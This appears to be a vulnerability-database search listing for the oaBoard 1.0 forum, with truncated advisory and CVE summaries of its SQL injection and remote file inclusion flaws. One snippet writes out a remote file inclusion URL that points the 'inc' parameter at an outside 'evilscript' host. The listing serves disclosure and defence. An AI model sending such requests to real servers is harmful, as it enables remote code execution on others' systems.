25 matches found
EUVD-2005-3393
Malware in sbrugna...
EUVD-2006-0102
Malware in sbrugna...
EUVD-2006-0084
Malware in sbrugna...
OaBoard 1.0 Forum.PHP Multiple SQL Injection Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/15245/info OaBoard is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in an SQL query. Successful exploitation could result in ...
OABoard 1.0 Forum Script Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/16105/info The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application. This could result in the execution of...
OABOARD Web Forum forum.php inc Parameter PHP Code Execution - Ver2 (CVE-2006-0076)
A code execution vulnerability has been reported in OABoard. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system...
OABOARD Web Forum forum.php inc Parameter PHP Code Execution - Ver2 (CVE-2006-0076)
A code execution vulnerability has been reported in OABoard. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system...
OaBoard 1.0 Remote File inclusion
OaBoard version 1.x have remote file inclusion . Variables $inc isn't initialized in the include http://host/oaboard/forum.php?inc=http://evilscript/ Hessam-x www.hessamx.net...
CVE-2006-0094
PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the incstat parameter, a different vulnerability than CVE-2006-0076. NOTE: the provenance of this information is unknown; the details are obtained solely from third...
Design/Logic Flaw
PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the incstat parameter, a different vulnerability than CVE-2006-0076. NOTE: the provenance of this information is unknown; the details are obtained solely from third...
CVE-2006-0094
CVE-2006-0094 describes a PHP remote file include in oaBoard 1.0, specifically in forum.php via the inc_stat parameter, enabling remote attackers to execute arbitrary PHP code. The connected documents confirm oaBoard 1.0 as affected and do not provide remediation details. No exploits or fixed ver...
CVE-2006-0076
PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the inc parameter...
Remote file inclusion
PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the inc parameter...
CVE-2006-0076
This CVE (CVE-2006-0076) relates to oaBoard 1.0: a PHP remote file inclusion flaw in forum.php where an input parameter inc can be controlled via URL to include a PHP file. The underlying issue is unsafely including external input as code, enabling arbitrary PHP execution if a remote file is incl...
EV0003.txt
New eVuln Advisory: oaBoard PHP Code Execution --------------------Summary---------------- Software: oaBoard Versions: 1.0 Critical Level: Dangerous Type: PHP Code Execution Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: Aliaksandr Hartsuyeu [email protected]...
[eVuln] oaBoard PHP Code Execution
New eVuln Advisory: oaBoard PHP Code Execution --------------------Summary---------------- Software: oaBoard Versions: 1.0 Critical Level: Dangerous Type: PHP Code Execution Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: Aliaksandr Hartsuyeu [email protected]...
OABoard 1.0 Forum - Remote File Inclusion
OABoard 1.0 Forum - Remote File Inclusion source: https://www.securityfocus.com/bid/16105/info The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application. This could result in the execution ...
OABoard 1.0 Forum - Remote File Inclusion
source: https://www.securityfocus.com/bid/16105/info The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application. This could result in the execution of arbitrary PHP code in the context of th...
CVE-2005-3394
Multiple SQL injection vulnerabilities in forum.php in oaboard forum 1.0 allow remote attackers to execute arbitrary SQL commands via the 1 channel parameter in the topics module and 2 topic parameter in the posting module...
CVE-2005-3394
Multiple SQL injection vulnerabilities in forum.php in oaboard forum 1.0 allow remote attackers to execute arbitrary SQL commands via the 1 channel parameter in the topics module and 2 topic parameter in the posting module...